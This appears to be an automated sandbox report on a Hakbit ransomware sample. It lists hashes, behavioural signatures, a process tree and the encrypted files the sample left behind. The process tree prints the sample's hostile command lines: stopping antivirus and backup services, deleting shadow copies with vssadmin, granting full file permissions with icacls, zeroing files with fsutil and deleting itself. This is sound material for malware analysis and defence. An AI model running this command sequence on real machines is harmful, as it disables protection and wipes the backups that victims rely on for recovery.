Analysis
-
max time kernel
139s -
max time network
97s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
18-06-2020 04:28
Static task
static1
Behavioral task
behavioral1
Sample
System.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
System.exe
Resource
win10
General
-
Target
System.exe
-
Size
66KB
-
MD5
8d6ab03994b0ce3466873aa7532fe76b
-
SHA1
156aecd4d8e65d205181ad5eace466c8798d3c86
-
SHA256
e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62
-
SHA512
2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 390 IoCs
Processes:
System.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1312 wrote to memory of 1480 1312 System.exe net.exe PID 1312 wrote to memory of 1480 1312 System.exe net.exe PID 1312 wrote to memory of 1480 1312 System.exe net.exe PID 1480 wrote to memory of 544 1480 net.exe net1.exe PID 1480 wrote to memory of 544 1480 net.exe net1.exe PID 1480 wrote to memory of 544 1480 net.exe net1.exe PID 1312 wrote to memory of 1012 1312 System.exe net.exe PID 1312 wrote to memory of 1012 1312 System.exe net.exe PID 1312 wrote to memory of 1012 1312 System.exe net.exe PID 1012 wrote to memory of 1612 1012 net.exe net1.exe PID 1012 wrote to memory of 1612 1012 net.exe net1.exe PID 1012 wrote to memory of 1612 1012 net.exe net1.exe PID 1312 wrote to memory of 240 1312 System.exe net.exe PID 1312 wrote to memory of 240 1312 System.exe net.exe PID 1312 wrote to memory of 240 1312 System.exe net.exe PID 240 wrote to memory of 1068 240 net.exe net1.exe PID 240 wrote to memory of 1068 240 net.exe net1.exe PID 240 wrote to memory of 1068 240 net.exe net1.exe PID 1312 wrote to memory of 1088 1312 System.exe net.exe PID 1312 wrote to memory of 1088 1312 System.exe net.exe PID 1312 wrote to memory of 1088 1312 System.exe net.exe PID 1088 wrote to memory of 1520 1088 net.exe net1.exe PID 1088 wrote to memory of 1520 1088 net.exe net1.exe PID 1088 wrote to memory of 1520 1088 net.exe net1.exe PID 1312 wrote to memory of 1668 1312 System.exe net.exe PID 1312 wrote to memory of 1668 1312 System.exe net.exe PID 1312 wrote to memory of 1668 1312 System.exe net.exe PID 1668 wrote to memory of 1360 1668 net.exe net1.exe PID 1668 wrote to memory of 1360 1668 net.exe net1.exe PID 1668 wrote to memory of 1360 1668 net.exe net1.exe PID 1312 wrote to memory of 1764 1312 System.exe net.exe PID 1312 wrote to memory of 1764 1312 System.exe net.exe PID 1312 wrote to memory of 1764 1312 System.exe net.exe PID 1764 wrote to memory of 1824 1764 net.exe net1.exe PID 1764 wrote to memory of 1824 1764 net.exe net1.exe PID 1764 wrote to memory of 1824 1764 net.exe net1.exe PID 1312 wrote to memory of 1836 1312 System.exe net.exe PID 1312 wrote to memory of 1836 1312 System.exe net.exe PID 1312 wrote to memory of 1836 1312 System.exe net.exe PID 1836 wrote to memory of 1844 1836 net.exe net1.exe PID 1836 wrote to memory of 1844 1836 net.exe net1.exe PID 1836 wrote to memory of 1844 1836 net.exe net1.exe PID 1312 wrote to memory of 1788 1312 System.exe net.exe PID 1312 wrote to memory of 1788 1312 System.exe net.exe PID 1312 wrote to memory of 1788 1312 System.exe net.exe PID 1788 wrote to memory of 1768 1788 net.exe net1.exe PID 1788 wrote to memory of 1768 1788 net.exe net1.exe PID 1788 wrote to memory of 1768 1788 net.exe net1.exe PID 1312 wrote to memory of 652 1312 System.exe net.exe PID 1312 wrote to memory of 652 1312 System.exe net.exe PID 1312 wrote to memory of 652 1312 System.exe net.exe PID 652 wrote to memory of 864 652 net.exe net1.exe PID 652 wrote to memory of 864 652 net.exe net1.exe PID 652 wrote to memory of 864 652 net.exe net1.exe PID 1312 wrote to memory of 984 1312 System.exe net.exe PID 1312 wrote to memory of 984 1312 System.exe net.exe PID 1312 wrote to memory of 984 1312 System.exe net.exe PID 984 wrote to memory of 616 984 net.exe net1.exe PID 984 wrote to memory of 616 984 net.exe net1.exe PID 984 wrote to memory of 616 984 net.exe net1.exe PID 1312 wrote to memory of 1316 1312 System.exe net.exe PID 1312 wrote to memory of 1316 1312 System.exe net.exe PID 1312 wrote to memory of 1316 1312 System.exe net.exe PID 1316 wrote to memory of 1624 1316 net.exe net1.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
System.exepid process 1312 System.exe 1312 System.exe 1312 System.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1292 notepad.exe -
Drops startup file 1 IoCs
Processes:
System.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk System.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
System.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." System.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "\r\n*** ATTENTION ***\r\nYour File Locked By \"Military Algorithm\" And Wiped. \r\nFor Recovery Your Files Contact : l1u1t1@secmail.pro" System.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
System.exenotepad.exepid process 1312 System.exe 1312 System.exe 1312 System.exe 1292 notepad.exe -
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies file permissions 1 TTPs 29 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 608 icacls.exe 232 icacls.exe 1104 icacls.exe 216 icacls.exe 1080 icacls.exe 1544 icacls.exe 1208 icacls.exe 544 icacls.exe 1612 icacls.exe 1932 icacls.exe 1516 icacls.exe 1056 icacls.exe 236 icacls.exe 1108 icacls.exe 1308 icacls.exe 324 icacls.exe 872 icacls.exe 1560 icacls.exe 748 icacls.exe 632 icacls.exe 1040 icacls.exe 1804 icacls.exe 1696 icacls.exe 1292 icacls.exe 872 icacls.exe 1504 icacls.exe 1828 icacls.exe 1824 icacls.exe 1008 icacls.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
System.exetaskkill.exetaskkill.exetaskkill.exevssvc.exedescription pid process Token: SeDebugPrivilege 1312 System.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 1324 taskkill.exe Token: SeDebugPrivilege 1000 taskkill.exe Token: SeBackupPrivilege 2004 vssvc.exe Token: SeRestorePrivilege 2004 vssvc.exe Token: SeAuditPrivilege 2004 vssvc.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 324 cmd.exe -
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1632 vssadmin.exe 1044 vssadmin.exe 1116 vssadmin.exe 744 vssadmin.exe 1524 vssadmin.exe 780 vssadmin.exe 1212 vssadmin.exe 2028 vssadmin.exe 1556 vssadmin.exe 1508 vssadmin.exe 1936 vssadmin.exe 520 vssadmin.exe 1624 vssadmin.exe 212 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1852 taskkill.exe 1324 taskkill.exe 1000 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\System.exe"C:\Users\Admin\AppData\Local\Temp\System.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
- Drops startup file
- Modifies WinLogon
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" A:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" B:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" D:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" E:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" F:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" G:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" H:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" I:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" J:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" K:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" L:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" M:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" N:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" O:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" P:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" Q:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" R:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" S:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" T:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" U:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" V:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" W:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" X:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" Y:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" Z:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\System.exe2⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
-
C:\Users\Admin\AppData\Local\Temp\HELP_ME_RECOVER_MY_FILES.txt
-
C:\Users\Admin\AppData\Local\Temp\ox125cvy.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk
-
C:\Users\Admin\Desktop\EnableInitialize.odt.crypted
-
C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
-
C:\Users\Admin\Desktop\InitializeStart.m4a.crypted
-
C:\Users\Admin\Desktop\InstallSkip.snd.crypted
-
C:\Users\Admin\Desktop\OutUse.png.crypted
-
C:\Users\Admin\Desktop\RestartImport.mp3.crypted
-
C:\Users\Admin\Desktop\ResumeDebug.7z.crypted
-
C:\Users\Admin\Desktop\SkipSet.gif.crypted
-
C:\Users\Admin\Desktop\UnregisterRequest.ods.crypted
-
C:\Users\Admin\Documents\Are.docx.crypted
-
C:\Users\Admin\Documents\CompleteDisconnect.odt.crypted
-
C:\Users\Admin\Documents\ConfirmEdit.doc.crypted
-
C:\Users\Admin\Documents\ConnectClose.ods.crypted
-
C:\Users\Admin\Documents\Files.docx.crypted
-
C:\Users\Admin\Documents\LockHide.pdf.crypted
-
C:\Users\Admin\Documents\MergeLimit.rtf.crypted
-
C:\Users\Admin\Documents\NewResolve.pptx.crypted
-
C:\Users\Admin\Documents\OpenSend.docx.crypted
-
C:\Users\Admin\Documents\Opened.docx.crypted
-
C:\Users\Admin\Documents\Recently.docx.crypted
-
C:\Users\Admin\Documents\RequestAdd.html.crypted
-
C:\Users\Admin\Documents\RestartRestore.mhtml.crypted
-
C:\Users\Admin\Documents\StartOpen.txt.crypted
-
C:\Users\Admin\Documents\SyncWait.csv.crypted
-
C:\Users\Admin\Documents\These.docx.crypted
-
C:\Users\Admin\Documents\TraceMeasure.ods.crypted
-
C:\Users\Admin\Documents\UseDeny.ods.crypted
-
C:\Users\Admin\Music\AssertUninstall.mhtml.crypted
-
C:\Users\Admin\Music\CompleteUpdate.mp4.crypted
-
C:\Users\Admin\Music\EditUse.mp3.crypted
-
C:\Users\Admin\Music\ImportMove.m4a.crypted
-
C:\Users\Admin\Music\OutClose.zip.crypted
-
C:\Users\Admin\Music\ResolveUnprotect.7z.crypted
-
C:\Users\Admin\Pictures\AddConvertTo.png.crypted
-
C:\Users\Admin\Pictures\CheckpointSkip.jpg.crypted
-
C:\Users\Admin\Pictures\ConvertFromEdit.tiff.crypted
-
C:\Users\Admin\Pictures\DebugRename.jpeg.crypted
-
C:\Users\Admin\Pictures\EnableReset.png.crypted
-
C:\Users\Admin\Pictures\EnableSave.jpeg.crypted
-
C:\Users\Admin\Pictures\ExitCheckpoint.svg.crypted
-
C:\Users\Admin\Pictures\ExitDeny.png.crypted
-
C:\Users\Admin\Pictures\GrantConvertFrom.gif.crypted
-
C:\Users\Admin\Pictures\ResumeSwitch.svg.crypted
-
C:\Users\Admin\Pictures\SyncRequest.svg.crypted
-
C:\Users\Admin\Pictures\UnblockRegister.svg.crypted
-
C:\Users\Admin\Pictures\UpdateCheckpoint.png.crypted
-
C:\Users\Admin\Pictures\WriteResolve.dwg.crypted
-
memory/212-88-0x0000000000000000-mapping.dmp
-
memory/216-104-0x0000000000000000-mapping.dmp
-
memory/232-118-0x0000000000000000-mapping.dmp
-
memory/236-96-0x0000000000000000-mapping.dmp
-
memory/240-4-0x0000000000000000-mapping.dmp
-
memory/300-54-0x0000000000000000-mapping.dmp
-
memory/324-41-0x0000000000000000-mapping.dmp
-
memory/324-180-0x0000000000000000-mapping.dmp
-
memory/324-137-0x0000000000000000-mapping.dmp
-
memory/364-177-0x0000000000000000-mapping.dmp
-
memory/368-52-0x0000000000000000-mapping.dmp
-
memory/520-84-0x0000000000000000-mapping.dmp
-
memory/544-69-0x0000000000000000-mapping.dmp
-
memory/544-111-0x0000000000000000-mapping.dmp
-
memory/544-1-0x0000000000000000-mapping.dmp
-
memory/568-51-0x0000000000000000-mapping.dmp
-
memory/608-95-0x0000000000000000-mapping.dmp
-
memory/616-19-0x0000000000000000-mapping.dmp
-
memory/632-114-0x0000000000000000-mapping.dmp
-
memory/652-16-0x0000000000000000-mapping.dmp
-
memory/744-82-0x0000000000000000-mapping.dmp
-
memory/748-106-0x0000000000000000-mapping.dmp
-
memory/780-81-0x0000000000000000-mapping.dmp
-
memory/836-38-0x0000000000000000-mapping.dmp
-
memory/848-40-0x0000000000000000-mapping.dmp
-
memory/856-32-0x0000000000000000-mapping.dmp
-
memory/864-17-0x0000000000000000-mapping.dmp
-
memory/872-122-0x0000000000000000-mapping.dmp
-
memory/872-98-0x0000000000000000-mapping.dmp
-
memory/984-18-0x0000000000000000-mapping.dmp
-
memory/1000-78-0x0000000000000000-mapping.dmp
-
memory/1008-120-0x0000000000000000-mapping.dmp
-
memory/1012-2-0x0000000000000000-mapping.dmp
-
memory/1040-97-0x0000000000000000-mapping.dmp
-
memory/1044-90-0x0000000000000000-mapping.dmp
-
memory/1056-109-0x0000000000000000-mapping.dmp
-
memory/1060-70-0x0000000000000000-mapping.dmp
-
memory/1064-42-0x0000000000000000-mapping.dmp
-
memory/1068-5-0x0000000000000000-mapping.dmp
-
memory/1068-73-0x0000000000000000-mapping.dmp
-
memory/1080-107-0x0000000000000000-mapping.dmp
-
memory/1084-68-0x0000000000000000-mapping.dmp
-
memory/1088-6-0x0000000000000000-mapping.dmp
-
memory/1092-74-0x0000000000000000-mapping.dmp
-
memory/1100-65-0x0000000000000000-mapping.dmp
-
memory/1104-178-0x0000000000000000-mapping.dmp
-
memory/1104-121-0x0000000000000000-mapping.dmp
-
memory/1104-34-0x0000000000000000-mapping.dmp
-
memory/1108-115-0x0000000000000000-mapping.dmp
-
memory/1116-80-0x0000000000000000-mapping.dmp
-
memory/1200-33-0x0000000000000000-mapping.dmp
-
memory/1200-66-0x0000000000000000-mapping.dmp
-
